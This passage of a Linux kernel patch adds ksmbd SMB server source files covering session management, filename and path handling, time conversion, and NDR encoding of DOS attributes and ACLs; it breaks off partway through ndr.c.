++	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++	ksmbd_expire_session(conn);
++	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
++}
++
++static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
++{
++	struct channel *chann;
++
++	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
++	if (!chann)
++		return -ENOENT;
++
++	kfree(chann);
++	return 0;
++}
++
++void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
++{
++	struct ksmbd_session *sess;
++	unsigned long id;
++
++	down_write(&sessions_table_lock);
++	if (conn->binding) {
++		int bkt;
++		struct hlist_node *tmp;
++
++		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
++			if (!ksmbd_chann_del(conn, sess) &&
++			    xa_empty(&sess->ksmbd_chann_list)) {
++				hash_del(&sess->hlist);
++				ksmbd_session_destroy(sess);
++			}
++		}
++	}
++
++	xa_for_each(&conn->sessions, id, sess) {
++		unsigned long chann_id;
++		struct channel *chann;
++
++		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
++			if (chann->conn != conn)
++				ksmbd_conn_set_exiting(chann->conn);
++		}
++
++		ksmbd_chann_del(conn, sess);
++		if (xa_empty(&sess->ksmbd_chann_list)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
++struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
++					   unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	sess = xa_load(&conn->sessions, id);
++	if (sess)
++		sess->last_active = jiffies;
++	return sess;
++}
++
++struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	down_read(&sessions_table_lock);
++	sess = __session_lookup(id);
++	if (sess)
++		sess->last_active = jiffies;
++	up_read(&sessions_table_lock);
++
++	return sess;
++}
++
++struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
++					       unsigned long long id)
++{
++	struct ksmbd_session *sess;
++
++	sess = ksmbd_session_lookup(conn, id);
++	if (!sess && conn->binding)
++		sess = ksmbd_session_lookup_slowpath(id);
++	if (sess && sess->state != SMB2_SESSION_VALID)
++		sess = NULL;
++	return sess;
++}
++
++struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
++						    u64 sess_id)
++{
++	struct preauth_session *sess;
++
++	sess = kmalloc(sizeof(struct preauth_session), GFP_KERNEL);
++	if (!sess)
++		return NULL;
++
++	sess->id = sess_id;
++	memcpy(sess->Preauth_HashValue, conn->preauth_info->Preauth_HashValue,
++	       PREAUTH_HASHVALUE_SIZE);
++	list_add(&sess->preauth_entry, &conn->preauth_sess_table);
++
++	return sess;
++}
++
++static bool ksmbd_preauth_session_id_match(struct preauth_session *sess,
++					   unsigned long long id)
++{
++	return sess->id == id;
++}
++
++struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
++						     unsigned long long id)
++{
++	struct preauth_session *sess = NULL;
++
++	list_for_each_entry(sess, &conn->preauth_sess_table, preauth_entry) {
++		if (ksmbd_preauth_session_id_match(sess, id))
++			return sess;
++	}
++	return NULL;
++}
++
++static int __init_smb2_session(struct ksmbd_session *sess)
++{
++	int id = ksmbd_acquire_smb2_uid(&session_ida);
++
++	if (id < 0)
++		return -EINVAL;
++	sess->id = id;
++	return 0;
++}
++
++static struct ksmbd_session *__session_create(int protocol)
++{
++	struct ksmbd_session *sess;
++	int ret;
++
++	if (protocol != CIFDS_SESSION_FLAG_SMB2)
++		return NULL;
++
++	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
++	if (!sess)
++		return NULL;
++
++	if (ksmbd_init_file_table(&sess->file_table))
++		goto error;
++
++	sess->last_active = jiffies;
++	sess->state = SMB2_SESSION_IN_PROGRESS;
++	set_session_flag(sess, protocol);
++	xa_init(&sess->tree_conns);
++	xa_init(&sess->ksmbd_chann_list);
++	INIT_LIST_HEAD(&sess->rpc_handle_list);
++	sess->sequence_number = 1;
++
++	ret = __init_smb2_session(sess);
++	if (ret)
++		goto error;
++
++	ida_init(&sess->tree_conn_ida);
++
++	down_write(&sessions_table_lock);
++	hash_add(sessions_table, &sess->hlist, sess->id);
++	up_write(&sessions_table_lock);
++
++	return sess;
++
++error:
++	ksmbd_session_destroy(sess);
++	return NULL;
++}
++
++struct ksmbd_session *ksmbd_smb2_session_create(void)
++{
++	return __session_create(CIFDS_SESSION_FLAG_SMB2);
++}
++
++int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess)
++{
++	int id = -EINVAL;
++
++	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
++		id = ksmbd_acquire_smb2_tid(&sess->tree_conn_ida);
++
++	return id;
++}
++
++void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id)
++{
++	if (id >= 0)
++		ksmbd_release_id(&sess->tree_conn_ida, id);
++}
+diff --git a/fs/smb/server/mgmt/user_session.h b/fs/smb/server/mgmt/user_session.h
+new file mode 100644
+index 0000000000000..51f38e5b61abb
+--- /dev/null
++++ b/fs/smb/server/mgmt/user_session.h
+@@ -0,0 +1,103 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __USER_SESSION_MANAGEMENT_H__
++#define __USER_SESSION_MANAGEMENT_H__
++
++#include <linux/hashtable.h>
++#include <linux/xarray.h>
++
++#include "../smb_common.h"
++#include "../ntlmssp.h"
++
++#define CIFDS_SESSION_FLAG_SMB2		BIT(1)
++
++#define PREAUTH_HASHVALUE_SIZE		64
++
++struct ksmbd_file_table;
++
++struct channel {
++	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
++	struct ksmbd_conn	*conn;
++};
++
++struct preauth_session {
++	__u8			Preauth_HashValue[PREAUTH_HASHVALUE_SIZE];
++	u64			id;
++	struct list_head	preauth_entry;
++};
++
++struct ksmbd_session {
++	u64				id;
++
++	__u16				dialect;
++	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
++
++	struct ksmbd_user		*user;
++	unsigned int			sequence_number;
++	unsigned int			flags;
++
++	bool				sign;
++	bool				enc;
++	bool				is_anonymous;
++
++	int				state;
++	__u8				*Preauth_HashValue;
++
++	char				sess_key[CIFS_KEY_SIZE];
++
++	struct hlist_node		hlist;
++	struct xarray			ksmbd_chann_list;
++	struct xarray			tree_conns;
++	struct ida			tree_conn_ida;
++	struct list_head		rpc_handle_list;
++
++	__u8				smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8				smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
++	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
++
++	struct ksmbd_file_table		file_table;
++	unsigned long			last_active;
++};
++
++static inline int test_session_flag(struct ksmbd_session *sess, int bit)
++{
++	return sess->flags & bit;
++}
++
++static inline void set_session_flag(struct ksmbd_session *sess, int bit)
++{
++	sess->flags |= bit;
++}
++
++static inline void clear_session_flag(struct ksmbd_session *sess, int bit)
++{
++	sess->flags &= ~bit;
++}
++
++struct ksmbd_session *ksmbd_smb2_session_create(void);
++
++void ksmbd_session_destroy(struct ksmbd_session *sess);
++
++struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id);
++struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
++					   unsigned long long id);
++int ksmbd_session_register(struct ksmbd_conn *conn,
++			   struct ksmbd_session *sess);
++void ksmbd_sessions_deregister(struct ksmbd_conn *conn);
++struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
++					       unsigned long long id);
++struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
++						    u64 sess_id);
++struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
++						     unsigned long long id);
++
++int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess);
++void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id);
++
++int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name);
++void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id);
++int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id);
++#endif /* __USER_SESSION_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/misc.c b/fs/smb/server/misc.c
+new file mode 100644
+index 0000000000000..9e8afaa686e3a
+--- /dev/null
++++ b/fs/smb/server/misc.c
+@@ -0,0 +1,381 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/kernel.h>
++#include <linux/xattr.h>
++#include <linux/fs.h>
++#include <linux/unicode.h>
++
++#include "misc.h"
++#include "smb_common.h"
++#include "connection.h"
++#include "vfs.h"
++
++#include "mgmt/share_config.h"
++
++/**
++ * match_pattern() - compare a string with a pattern which may include
++ * the wildcards '*' and '?'
++ * TODO : add handling for DOS_DOT, DOS_QM and DOS_STAR
++ *
++ * @str:	string to compare with a pattern
++ * @len:	string length
++ * @pattern:	pattern string which may include the wildcards '*' and '?'
++ *
++ * Return:	non-zero if the pattern matched the string, otherwise 0
++ */
++int match_pattern(const char *str, size_t len, const char *pattern)
++{
++	const char *s = str;
++	const char *p = pattern;
++	bool star = false;
++
++	while (*s && len) {
++		switch (*p) {
++		case '?':
++			s++;
++			len--;
++			p++;
++			break;
++		case '*':
++			star = true;
++			str = s;
++			if (!*++p)
++				return true;
++			pattern = p;
++			break;
++		default:
++			if (tolower(*s) == tolower(*p)) {
++				s++;
++				len--;
++				p++;
++			} else {
++				if (!star)
++					return false;
++				str++;
++				s = str;
++				p = pattern;
++			}
++			break;
++		}
++	}
++
++	if (*p == '*')
++		++p;
++	return !*p;
++}
++
++/*
++ * is_char_allowed() - check for valid character
++ * @ch:		input character to be checked
++ *
++ * Return:	1 if char is allowed, otherwise 0
++ */
++static inline int is_char_allowed(char ch)
++{
++	/* check for control chars, wildcards etc. */
++	if (!(ch & 0x80) &&
++	    (ch <= 0x1f ||
++	     ch == '?' || ch == '"' || ch == '<' ||
++	     ch == '>' || ch == '|' || ch == '*'))
++		return 0;
++
++	return 1;
++}
++
++int ksmbd_validate_filename(char *filename)
++{
++	while (*filename) {
++		char c = *filename;
++
++		filename++;
++		if (!is_char_allowed(c)) {
++			ksmbd_debug(VFS, "File name validation failed: 0x%x\n", c);
++			return -ENOENT;
++		}
++	}
++
++	return 0;
++}
++
++static int ksmbd_validate_stream_name(char *stream_name)
++{
++	while (*stream_name) {
++		char c = *stream_name;
++
++		stream_name++;
++		if (c == '/' || c == ':' || c == '\\') {
++			pr_err("Stream name validation failed: %c\n", c);
++			return -ENOENT;
++		}
++	}
++
++	return 0;
++}
++
++int parse_stream_name(char *filename, char **stream_name, int *s_type)
++{
++	char *stream_type;
++	char *s_name;
++	int rc = 0;
++
++	s_name = filename;
++	filename = strsep(&s_name, ":");
++	ksmbd_debug(SMB, "filename : %s, streams : %s\n", filename, s_name);
++	if (strchr(s_name, ':')) {
++		stream_type = s_name;
++		s_name = strsep(&stream_type, ":");
++
++		rc = ksmbd_validate_stream_name(s_name);
++		if (rc < 0) {
++			rc = -ENOENT;
++			goto out;
++		}
++
++		ksmbd_debug(SMB, "stream name : %s, stream type : %s\n", s_name,
++			    stream_type);
++		if (!strncasecmp("$data", stream_type, 5))
++			*s_type = DATA_STREAM;
++		else if (!strncasecmp("$index_allocation", stream_type, 17))
++			*s_type = DIR_STREAM;
++		else
++			rc = -ENOENT;
++	}
++
++	*stream_name = s_name;
++out:
++	return rc;
++}
++
++/**
++ * convert_to_nt_pathname() - extract and return the windows path string
++ *      with the share directory prefix removed from the file path
++ * @share: ksmbd_share_config pointer
++ * @path: path to report
++ *
++ * Return:	windows path string or error
++ */
++
++char *convert_to_nt_pathname(struct ksmbd_share_config *share,
++			     const struct path *path)
++{
++	char *pathname, *ab_pathname, *nt_pathname;
++	int share_path_len = share->path_sz;
++
++	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!pathname)
++		return ERR_PTR(-EACCES);
++
++	ab_pathname = d_path(path, pathname, PATH_MAX);
++	if (IS_ERR(ab_pathname)) {
++		nt_pathname = ERR_PTR(-EACCES);
++		goto free_pathname;
++	}
++
++	if (strncmp(ab_pathname, share->path, share_path_len)) {
++		nt_pathname = ERR_PTR(-EACCES);
++		goto free_pathname;
++	}
++
++	nt_pathname = kzalloc(strlen(&ab_pathname[share_path_len]) + 2, GFP_KERNEL);
++	if (!nt_pathname) {
++		nt_pathname = ERR_PTR(-ENOMEM);
++		goto free_pathname;
++	}
++	if (ab_pathname[share_path_len] == '\0')
++		strcpy(nt_pathname, "/");
++	strcat(nt_pathname, &ab_pathname[share_path_len]);
++
++	ksmbd_conv_path_to_windows(nt_pathname);
++
++free_pathname:
++	kfree(pathname);
++	return nt_pathname;
++}
++
++int get_nlink(struct kstat *st)
++{
++	int nlink;
++
++	nlink = st->nlink;
++	if (S_ISDIR(st->mode))
++		nlink--;
++
++	return nlink;
++}
++
++void ksmbd_conv_path_to_unix(char *path)
++{
++	strreplace(path, '\\', '/');
++}
++
++void ksmbd_strip_last_slash(char *path)
++{
++	int len = strlen(path);
++
++	while (len && path[len - 1] == '/') {
++		path[len - 1] = '\0';
++		len--;
++	}
++}
++
++void ksmbd_conv_path_to_windows(char *path)
++{
++	strreplace(path, '/', '\\');
++}
++
++char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name)
++{
++	char *cf_name;
++	int cf_len;
++
++	cf_name = kzalloc(KSMBD_REQ_MAX_SHARE_NAME, GFP_KERNEL);
++	if (!cf_name)
++		return ERR_PTR(-ENOMEM);
++
++	if (IS_ENABLED(CONFIG_UNICODE) && um) {
++		const struct qstr q_name = {.name = name, .len = strlen(name)};
++
++		cf_len = utf8_casefold(um, &q_name, cf_name,
++				       KSMBD_REQ_MAX_SHARE_NAME);
++		if (cf_len < 0)
++			goto out_ascii;
++
++		return cf_name;
++	}
++
++out_ascii:
++	cf_len = strscpy(cf_name, name, KSMBD_REQ_MAX_SHARE_NAME);
++	if (cf_len < 0) {
++		kfree(cf_name);
++		return ERR_PTR(-E2BIG);
++	}
++
++	for (; *cf_name; ++cf_name)
++		*cf_name = isascii(*cf_name) ? tolower(*cf_name) : *cf_name;
++	return cf_name - cf_len;
++}
++
++/**
++ * ksmbd_extract_sharename() - get share name from tree connect request
++ * @treename:	buffer containing tree name and share name
++ *
++ * Return:      share name on success, otherwise error
++ */
++char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename)
++{
++	const char *name = treename, *pos = strrchr(name, '\\');
++
++	if (pos)
++		name = (pos + 1);
++
++	/* caller has to free the memory */
++	return ksmbd_casefold_sharename(um, name);
++}
++
++/**
++ * convert_to_unix_name() - convert windows name to unix format
++ * @share:	ksmbd_share_config pointer
++ * @name:	file name that is relative to share
++ *
++ * Return:	converted name on success, otherwise NULL
++ */
++char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name)
++{
++	int no_slash = 0, name_len, path_len;
++	char *new_name;
++
++	if (name[0] == '/')
++		name++;
++
++	path_len = share->path_sz;
++	name_len = strlen(name);
++	new_name = kmalloc(path_len + name_len + 2, GFP_KERNEL);
++	if (!new_name)
++		return new_name;
++
++	memcpy(new_name, share->path, path_len);
++	if (new_name[path_len - 1] != '/') {
++		new_name[path_len] = '/';
++		no_slash = 1;
++	}
++
++	memcpy(new_name + path_len + no_slash, name, name_len);
++	path_len += name_len + no_slash;
++	new_name[path_len] = 0x00;
++	return new_name;
++}
++
++char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
++				  const struct nls_table *local_nls,
++				  int *conv_len)
++{
++	char *conv;
++	int  sz = min(4 * d_info->name_len, PATH_MAX);
++
++	if (!sz)
++		return NULL;
++
++	conv = kmalloc(sz, GFP_KERNEL);
++	if (!conv)
++		return NULL;
++
++	/* XXX */
++	*conv_len = smbConvertToUTF16((__le16 *)conv, d_info->name,
++				      d_info->name_len, local_nls, 0);
++	*conv_len *= 2;
++
++	/* The buffer was allocated twice as big as needed. */
++	conv[*conv_len] = 0x00;
++	conv[*conv_len + 1] = 0x00;
++	return conv;
++}
++
++/*
++ * Convert the NT UTC (based on 1601-01-01, in hundred-nanosecond units)
++ * into Unix UTC (based on 1970-01-01, in seconds).
++ */
++struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc)
++{
++	struct timespec64 ts;
++
++	/* Subtract the NTFS time offset, then convert to 1s intervals. */
++	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
++	u64 abs_t;
++
++	/*
++	 * Unfortunately we cannot use normal 64-bit division on a 32-bit arch,
++	 * and the alternative, do_div, does not work with negative numbers, so
++	 * we have to special-case them.
++	 */
++	if (t < 0) {
++		abs_t = -t;
++		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
++		ts.tv_nsec = -ts.tv_nsec;
++		ts.tv_sec = -abs_t;
++	} else {
++		abs_t = t;
++		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
++		ts.tv_sec = abs_t;
++	}
++
++	return ts;
++}
++
++/* Convert the Unix UTC into NT UTC. */
++inline u64 ksmbd_UnixTimeToNT(struct timespec64 t)
++{
++	/* Convert to 100ns intervals and then add the NTFS time offset. */
++	return (u64)t.tv_sec * 10000000 + t.tv_nsec / 100 + NTFS_TIME_OFFSET;
++}
++
++inline long long ksmbd_systime(void)
++{
++	struct timespec64	ts;
++
++	ktime_get_real_ts64(&ts);
++	return ksmbd_UnixTimeToNT(ts);
++}
+diff --git a/fs/smb/server/misc.h b/fs/smb/server/misc.h
+new file mode 100644
+index 0000000000000..1facfcd21200f
+--- /dev/null
++++ b/fs/smb/server/misc.h
+@@ -0,0 +1,37 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_MISC_H__
++#define __KSMBD_MISC_H__
++
++struct ksmbd_share_config;
++struct nls_table;
++struct kstat;
++struct ksmbd_file;
++
++int match_pattern(const char *str, size_t len, const char *pattern);
++int ksmbd_validate_filename(char *filename);
++int parse_stream_name(char *filename, char **stream_name, int *s_type);
++char *convert_to_nt_pathname(struct ksmbd_share_config *share,
++			     const struct path *path);
++int get_nlink(struct kstat *st);
++void ksmbd_conv_path_to_unix(char *path);
++void ksmbd_strip_last_slash(char *path);
++void ksmbd_conv_path_to_windows(char *path);
++char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name);
++char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
++char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name);
++
++#define KSMBD_DIR_INFO_ALIGNMENT	8
++struct ksmbd_dir_info;
++char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
++				  const struct nls_table *local_nls,
++				  int *conv_len);
++
++#define NTFS_TIME_OFFSET	((u64)(369 * 365 + 89) * 24 * 3600 * 10000000)
++struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc);
++u64 ksmbd_UnixTimeToNT(struct timespec64 t);
++long long ksmbd_systime(void);
++#endif /* __KSMBD_MISC_H__ */
+diff --git a/fs/smb/server/ndr.c b/fs/smb/server/ndr.c
+new file mode 100644
+index 0000000000000..4d9e0b54e3dbf
+--- /dev/null
++++ b/fs/smb/server/ndr.c
+@@ -0,0 +1,514 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
++ *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++#include <linux/fs.h>
++
++#include "glob.h"
++#include "ndr.h"
++
++static inline char *ndr_get_field(struct ndr *n)
++{
++	return n->data + n->offset;
++}
++
++static int try_to_realloc_ndr_blob(struct ndr *n, size_t sz)
++{
++	char *data;
++
++	data = krealloc(n->data, n->offset + sz + 1024, GFP_KERNEL);
++	if (!data)
++		return -ENOMEM;
++
++	n->data = data;
++	n->length += 1024;
++	memset(n->data + n->offset, 0, 1024);
++	return 0;
++}
++
++static int ndr_write_int16(struct ndr *n, __u16 value)
++{
++	if (n->length <= n->offset + sizeof(value)) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sizeof(value));
++		if (ret)
++			return ret;
++	}
++
++	*(__le16 *)ndr_get_field(n) = cpu_to_le16(value);
++	n->offset += sizeof(value);
++	return 0;
++}
++
++static int ndr_write_int32(struct ndr *n, __u32 value)
++{
++	if (n->length <= n->offset + sizeof(value)) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sizeof(value));
++		if (ret)
++			return ret;
++	}
++
++	*(__le32 *)ndr_get_field(n) = cpu_to_le32(value);
++	n->offset += sizeof(value);
++	return 0;
++}
++
++static int ndr_write_int64(struct ndr *n, __u64 value)
++{
++	if (n->length <= n->offset + sizeof(value)) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sizeof(value));
++		if (ret)
++			return ret;
++	}
++
++	*(__le64 *)ndr_get_field(n) = cpu_to_le64(value);
++	n->offset += sizeof(value);
++	return 0;
++}
++
++static int ndr_write_bytes(struct ndr *n, void *value, size_t sz)
++{
++	if (n->length <= n->offset + sz) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sz);
++		if (ret)
++			return ret;
++	}
++
++	memcpy(ndr_get_field(n), value, sz);
++	n->offset += sz;
++	return 0;
++}
++
++static int ndr_write_string(struct ndr *n, char *value)
++{
++	size_t sz;
++
++	sz = strlen(value) + 1;
++	if (n->length <= n->offset + sz) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sz);
++		if (ret)
++			return ret;
++	}
++
++	memcpy(ndr_get_field(n), value, sz);
++	n->offset += sz;
++	n->offset = ALIGN(n->offset, 2);
++	return 0;
++}
++
++static int ndr_read_string(struct ndr *n, void *value, size_t sz)
++{
++	int len;
++
++	if (n->offset + sz > n->length)
++		return -EINVAL;
++
++	len = strnlen(ndr_get_field(n), sz);
++	if (value)
++		memcpy(value, ndr_get_field(n), len);
++	len++;
++	n->offset += len;
++	n->offset = ALIGN(n->offset, 2);
++	return 0;
++}
++
++static int ndr_read_bytes(struct ndr *n, void *value, size_t sz)
++{
++	if (n->offset + sz > n->length)
++		return -EINVAL;
++
++	if (value)
++		memcpy(value, ndr_get_field(n), sz);
++	n->offset += sz;
++	return 0;
++}
++
++static int ndr_read_int16(struct ndr *n, __u16 *value)
++{
++	if (n->offset + sizeof(__u16) > n->length)
++		return -EINVAL;
++
++	if (value)
++		*value = le16_to_cpu(*(__le16 *)ndr_get_field(n));
++	n->offset += sizeof(__u16);
++	return 0;
++}
++
++static int ndr_read_int32(struct ndr *n, __u32 *value)
++{
++	if (n->offset + sizeof(__u32) > n->length)
++		return -EINVAL;
++
++	if (value)
++		*value = le32_to_cpu(*(__le32 *)ndr_get_field(n));
++	n->offset += sizeof(__u32);
++	return 0;
++}
++
++static int ndr_read_int64(struct ndr *n, __u64 *value)
++{
++	if (n->offset + sizeof(__u64) > n->length)
++		return -EINVAL;
++
++	if (value)
++		*value = le64_to_cpu(*(__le64 *)ndr_get_field(n));
++	n->offset += sizeof(__u64);
++	return 0;
++}
++
++int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
++{
++	char hex_attr[12] = {0};
++	int ret;
++
++	n->offset = 0;
++	n->length = 1024;
++	n->data = kzalloc(n->length, GFP_KERNEL);
++	if (!n->data)
++		return -ENOMEM;
++
++	if (da->version == 3) {
++		snprintf(hex_attr, 10, "0x%x", da->attr);
++		ret = ndr_write_string(n, hex_attr);
++	} else {
++		ret = ndr_write_string(n, "");
++	}
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int16(n, da->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, da->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, da->flags);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, da->attr);
++	if (ret)
++		return ret;
++
++	if (da->version == 3) {
++		ret = ndr_write_int32(n, da->ea_size);
++		if (ret)
++			return ret;
++		ret = ndr_write_int64(n, da->size);
++		if (ret)
++			return ret;
++		ret = ndr_write_int64(n, da->alloc_size);
++	} else {
++		ret = ndr_write_int64(n, da->itime);
++	}
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int64(n, da->create_time);
++	if (ret)
++		return ret;
++
++	if (da->version == 3)
++		ret = ndr_write_int64(n, da->change_time);
++	return ret;
++}
++
++int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
++{
++	char hex_attr[12];
++	unsigned int version2;
++	int ret;
++
++	n->offset = 0;
++	ret = ndr_read_string(n, hex_attr, sizeof(hex_attr));
++	if (ret)
++		return ret;
++
++	ret = ndr_read_int16(n, &da->version);
++	if (ret)
++		return ret;
++
++	if (da->version != 3 && da->version != 4) {
++		ksmbd_debug(VFS, "v%d version is not supported\n", da->version);
++		return -EINVAL;
++	}
++
++	ret = ndr_read_int32(n, &version2);
++	if (ret)
++		return ret;
++
++	if (da->version != version2) {
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
++		       da->version, version2);
++		return -EINVAL;
++	}
++
++	ret = ndr_read_int32(n, NULL);
++	if (ret)
++		return ret;
++
++	ret = ndr_read_int32(n, &da->attr);
++	if (ret)
++		return ret;
++
++	if (da->version == 4) {
++		ret = ndr_read_int64(n, &da->itime);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, &da->create_time);
++	} else {
++		ret = ndr_read_int32(n, NULL);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, NULL);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, NULL);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, &da->create_time);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, NULL);
++	}
++
++	return ret;
++}
++
++static int ndr_encode_posix_acl_entry(struct ndr *n, struct xattr_smb_acl *acl)
++{
++	int i, ret;
++
++	ret = ndr_write_int32(n, acl->count);
++	if (ret)
++		return ret;
++
++	n->offset = ALIGN(n->offset, 8);
++	ret = ndr_write_int32(n, acl->count);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, 0);
++	if (ret)
++		return ret;
++
++	for (i = 0; i < acl->count; i++) {
++		n->offset = ALIGN(n->offset, 8);
++		ret = ndr_write_int16(n, acl->entries[i].type);
++		if (ret)
++			return ret;
++
++		ret = ndr_write_int16(n, acl->entries[i].type);
++		if (ret)
++			return ret;
++
++		if (acl->entries[i].type == SMB_ACL_USER) {
++			n->offset = ALIGN(n->offset, 8);
++			ret = ndr_write_int64(n, acl->entries[i].uid);
++		} else if (acl->entries[i].type == SMB_ACL_GROUP) {
++			n->offset = ALIGN(n->offset, 8);
++			ret = ndr_write_int64(n, acl->entries[i].gid);
++		}
++		if (ret)
++			return ret;
++
++		/* push permission */
++		ret = ndr_write_int32(n, acl->entries[i].perm);
++	}
++
++	return ret;
++}
++
++int ndr_encode_posix_acl(struct ndr *n,
++			 struct user_namespace *user_ns,
++			 struct inode *inode,
++			 struct xattr_smb_acl *acl,
++			 struct xattr_smb_acl *def_acl)
++{
++	unsigned int ref_id = 0x00020000;
++	int ret;
++	vfsuid_t vfsuid;
++	vfsgid_t vfsgid;
++
++	n->offset = 0;
++	n->length = 1024;
++	n->data = kzalloc(n->length, GFP_KERNEL);
++	if (!n->data)
++		return -ENOMEM;
++
++	if (acl) {
++		/* ACL ACCESS */
++		ret = ndr_write_int32(n, ref_id);
++		ref_id += 4;
++	} else {
++		ret = ndr_write_int32(n, 0);
++	}
++	if (ret)
++		return ret;
++
++	if (def_acl) {
++		/* DEFAULT ACL ACCESS */
++		ret = ndr_write_int32(n, ref_id);
++		ref_id += 4;
++	} else {
++		ret = ndr_write_int32(n, 0);
++	}
++	if (ret)
++		return ret;
++
++	vfsuid = i_uid_into_vfsuid(user_ns, inode);
++	ret = ndr_write_int64(n, from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid)));
++	if (ret)
++		return ret;
++	vfsgid = i_gid_into_vfsgid(user_ns, inode);
++	ret = ndr_write_int64(n, from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid)));
++	if (ret)
++		return ret;
++	ret = ndr_write_int32(n, inode->i_mode);
++	if (ret)
++		return ret;
++
++	if (acl) {
++		ret = ndr_encode_posix_acl_entry(n, acl);
++		if (def_acl && !ret)
++			ret = ndr_encode_posix_acl_entry(n, def_acl);
++	}
++	return ret;
++}
++
++int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
++{
++	unsigned int ref_id = 0x00020004;
++	int ret;
++
++	n->offset = 0;
++	n->length = 2048;
++	n->data = kzalloc(n->length, GFP_KERNEL);
++	if (!n->data)
++		return -ENOMEM;
++
++	ret = ndr_write_int16(n, acl->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, acl->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int16(n, 2);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, ref_id);
++	if (ret)
++		return ret;
++
++	/* push hash type and 64-byte hash */
++	ret = ndr_write_int16(n, acl->hash_type);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_bytes(n, acl->desc, acl->desc_len);
